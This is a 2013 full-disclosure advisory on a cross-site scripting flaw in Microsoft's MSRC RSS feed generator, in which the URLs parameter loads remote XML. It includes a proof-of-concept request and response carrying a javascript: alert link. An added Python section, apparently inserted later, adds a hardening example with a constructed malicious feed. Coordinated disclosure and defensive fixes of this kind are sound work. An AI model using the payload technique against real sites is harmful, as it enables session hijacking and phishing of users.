List: full-disclosure
Subject: [Full-disclosure] Microsoft MSRC RSS ASPX - CS Cross Site Web Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2013-08-29 19:03:12
Message-ID: 521F9AF0.9020603 () vulnerability-lab ! com
Title:
======
Microsoft MSRC RSS ASPX - CS Cross Site Web Vulnerability
Date:
=====
2013-07-28
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1026
Microsoft Security Response Center (MSRC) ID: 15180
Video: http://www.vulnerability-lab.com/get_content.php?id=1028
View: http://www.youtube.com/watch?v=wcIIFB4Gx7g
VL-ID:
=====
1026
Common Vulnerability Scoring System:
====================================
1.6
Introduction:
=============
Microsoft Online Services is Microsoft's hosted-software offering and a component of its software-plus-services strategy. Microsoft Online Services are hosted by Microsoft and sold with Microsoft partners. The suite includes Exchange Online, SharePoint Online, Office Communications Online, Microsoft Forefront, and Microsoft Office Live Meeting. For businesses, the software-plus-services approach enables organizations to access the capabilities of enterprise software through on-premises servers, as online services, or a combination of both, depending on specific business requirements. Services also provide the option to add complementary capabilities that enhance on-premises server software and simplify system management and maintenance.
(Copy of the vendor homepage: https://microsoftonline.com )
Abstract:
=========
An independent Vulnerability Laboratory researcher discovered a client-side cross-site scripting vulnerability in a Microsoft web application.
Report-Timeline:
================
2013-07-18: Researcher Notification & Coordination (Muhammad A.S.)
2013-07-19: Vendor Notification (Microsoft Security Response Center - MSRC)
2013-07-20: Vendor Response/Feedback (Microsoft Security Response Center - MSRC)
2013-07-26: Vendor Fix/Patch (Microsoft Development Team)
2013-07-28: Public Disclosure (Vulnerability Laboratory)
Status:
========
Published
Affected Products:
==================
Microsoft Corporation
Product: Security Response Center (MSRC) - Blog aspx Web Application 2013 Q2
Exploitation-Technique:
=======================
Remote
Severity:
=========
Low
Details:
========
It has been discovered that the file `rssfeedgenerator.aspx` does not validate its input parameters and is therefore vulnerable to remote XSS attacks. Because no validation is performed, it is possible to include remote XML files which are parsed and displayed on the main microsoft.com website. A remote attacker can include malicious XML files via the `URLs` variable, which can lead to remote JavaScript execution on the client machine within the context of the microsoft.com website.
The vulnerability is located in the `rssfeedgenerator.aspx` file and the vulnerable parameter is `URLs`, which can be exploited via the GET method to include remote (external) XML files.
Exploitation of the vulnerability requires no privileged application user account but low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent malware injects, external redirects and manipulation of the affected module or application context.
Vulnerable Module(s):
[+] RSS Feeds
Vulnerable Path:
[+] /security/msrc/rssfeedgenerator.aspx
Vulnerable File(s):
[+] rssfeedgenerator.aspx
Vulnerable Parameter(s):
[+] URLs
Proof of Concept:
=================
The client-side web vulnerability can be exploited by remote attackers without a privileged application user account and with low user interaction. For demonstration or to reproduce ...
GET /security/msrc/rssfeedgenerator.aspx?URLs=http://www.nybbletech.com/poc/ms/micro.xml&itemToDisplay=3&words=16 HTTP/1.1
Host: www.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: v1st=58D7FEA59B237B40; MC1=GUID=376046a1d44f8b42834ba1809be0406d&HASH=a146&LV=20136&V=4&LU=1371688854677; A=I&I=AxUFAAAAAACVBwAA4cYlXvROT/4qjCG/tr9eRg!!&V=4; WT_FPC=id=3513600256.30305614:lv=1373527230788:ss=1373527206515
Connection: keep-alive
Response:
INT NAV ONL PHY PRE PUR UNI"
X-AspNet-Version: 2.0.50727
VTag: 279923242400000000
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Date: Fri, 19 Jul 2013 14:44:14 GMT
Content-Length: 1847
<div id="rssData1"><div><table width="100%" cellspacing="0" cellpadding="0" border="0" >
<tr><td><a href="http://blogs.technet.com/b/srd/archive/2013/07/10/running-in-the-wild-not-for-so-long.aspx" target="_blank"> <b>Running in the wild, not for so long</b></a></td></tr><tr><td style="padding-bottom:2px;"><font size="1"> <i>Security Research & Defense - Wednesday, July 10, 2013 5:12:00 PM</i></font></td></tr><tr><td style="padding-bottom:10px;"> Over <a href="javascript:alert('VULNERABLE')">CLICK HERE</a>testinging we received a report from our partners about a possible unpatched Internet Explorer vulnerability ......</td></tr></table></div>
<div><table width="100%" cellspacing="0" cellpadding="0" border="0" ><tr><td><a href="http://blogs.technet.com/b/srd/archive/2013/07/09/assessing-risk-for-the-july-2013-security-updates.aspx" target="_blank"><b>Assessing risk for the July 2013 security updates</b></a></td></tr><tr><td style="padding-bottom:2px;"><font size="1"> <i>Security Research & Defense - Tuesday, July 9, 2013 10:09:00 AM</i></font></td></tr><tr><td style="padding-bottom:10px;">Today we released seven security bulletins addressing 34 CVE's. Six bulletins have a maximum severity rating of Critical, ...... </td></tr></table></div>
<div><table width="100%" cellspacing="0" cellpadding="0" border="0" ><tr><td> <a href="http://blogs.technet.com/b/srd/archive/2013/06/17/emet-4-0-now-available-for-download.aspx" target="_blank"> <b>EMET 4.0 now available for download</b></a></td></tr><tr><td style="padding-bottom:2px;"><font size="1"><i>Security Research & Defense - Monday, June 17, 2013 10:01:00 AM</i></font></td></tr><tr><td style="padding-bottom:10px;">We are pleased to announce that <strong>the final release of version 4.0 of the Enhanced Mitigation Experience Toolkit</strong>, ......</td></tr></table></div></div>
Solution:
=========
Input data passed via the `URLs` parameter should be validated. Only white-listed domains should be allowed for redirects and direct links.
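The Details section above describes the root cause (feed URLs taken from the `URLs` parameter without validation, and feed content rendered as markup), and the Solution asks for a domain allow-list. The Python below is an added example, not Microsoft's code nor the advisory author's, showing one way to implement both halves: an exact-host allow-list check for the feed URLs, and a renderer that escapes feed text and drops links whose scheme is not http(s), so a `javascript:` href in a fetched feed stays inert. The allow-listed host `blogs.technet.com`, the comma separator for the parameter and the sample feed are assumptions constructed for illustration.

```python
"""Added example (not Microsoft's or Vulnerability Lab's code): a hardened feed
renderer for a URLs-style parameter.  The allow-listed host, the comma separator
and the sample feed below are assumptions made for illustration."""
import html
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Assumed allow-list of feed hosts the page may fetch (hypothetical value).
ALLOWED_FEED_HOSTS = {"blogs.technet.com"}
SAFE_LINK_SCHEMES = {"http", "https"}


def _clean(url):
    """Drop ASCII control characters and whitespace, which browsers ignore when
    parsing a URL (otherwise 'java<TAB>script:' could slip past a scheme check)."""
    return "".join(ch for ch in url if ord(ch) > 0x20)


def is_allowed_feed_url(url, allowed_hosts=ALLOWED_FEED_HOSTS):
    """Server-side check for the URLs parameter: only absolute http(s) URLs whose
    host exactly matches an allow-listed host (no suffix matching, no userinfo)."""
    try:
        parts = urlsplit(_clean(url))
    except ValueError:
        return False
    if parts.scheme.lower() not in SAFE_LINK_SCHEMES:
        return False
    if parts.username is not None or parts.password is not None:
        return False  # "http://blogs.technet.com@evil.example/" must not pass
    host = parts.hostname
    return host is not None and host.lower() in allowed_hosts


def filter_feed_urls(raw_param, sep=","):
    """Split the (assumed comma-separated) URLs parameter and keep only allowed entries."""
    candidates = (s.strip() for s in raw_param.split(sep))
    return [u for u in candidates if u and is_allowed_feed_url(u)]


def safe_link(url):
    """Return a cleaned http(s) link or None; javascript:, data:, vbscript: are dropped."""
    cleaned = _clean(url)
    try:
        parts = urlsplit(cleaned)
    except ValueError:
        return None
    if parts.scheme.lower() in SAFE_LINK_SCHEMES and parts.netloc:
        return cleaned
    return None


def render_feed(feed_xml, max_items=3):
    """Parse an RSS document and build one HTML row per item with every untrusted
    string escaped.  Feed text is emitted as text, never as markup, so an
    <a href="javascript:..."> inside a description is shown literally, not run."""
    root = ET.fromstring(feed_xml)  # ElementTree does not resolve external entities
    rows = []
    for item in list(root.iter("item"))[:max_items]:
        title = html.escape(item.findtext("title", default=""), quote=True)
        desc = html.escape(item.findtext("description", default=""), quote=True)
        link = safe_link(item.findtext("link", default=""))
        if link is None:
            rows.append(f"<b>{title}</b><br>{desc}")
        else:
            href = html.escape(link, quote=True)
            rows.append(f'<a href="{href}" target="_blank" rel="noopener"><b>{title}</b></a><br>{desc}')
    return rows


# Constructed feed (not the advisory's file) shaped like the PoC payload.
MALICIOUS_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>constructed test feed</title>
<item>
  <title>Running in the wild, not for so long</title>
  <link>javascript:alert('VULNERABLE')</link>
  <description>Over &lt;a href="javascript:alert('VULNERABLE')"&gt;CLICK HERE&lt;/a&gt; we received a report</description>
</item>
<item>
  <title>Benign item</title>
  <link>https://blogs.technet.com/b/srd/</link>
  <description>plain text &amp; nothing else</description>
</item>
</channel></rss>"""

if __name__ == "__main__":
    print(filter_feed_urls("http://blogs.technet.com/b/srd/rss.aspx,http://www.nybbletech.com/poc/ms/micro.xml"))
    for row in render_feed(MALICIOUS_FEED):
        print(row)
```

The host check compares the parsed hostname for exact equality rather than testing a suffix, so `blogs.technet.com.evil.example` and `blogs.technet.com@evil.example` are both rejected; the renderer treats the feed as data and escapes it, which is the control that actually stops the `javascript:` payload even when an allow-listed feed is compromised.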
Risk:
=====
The security risk of the client-side cross-site scripting vulnerability in the Microsoft security web application is estimated as low(+)|(-)medium.
Credits:
========
Muhammad Ahmed Siddiqui - ahmed@nybbletech.com
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/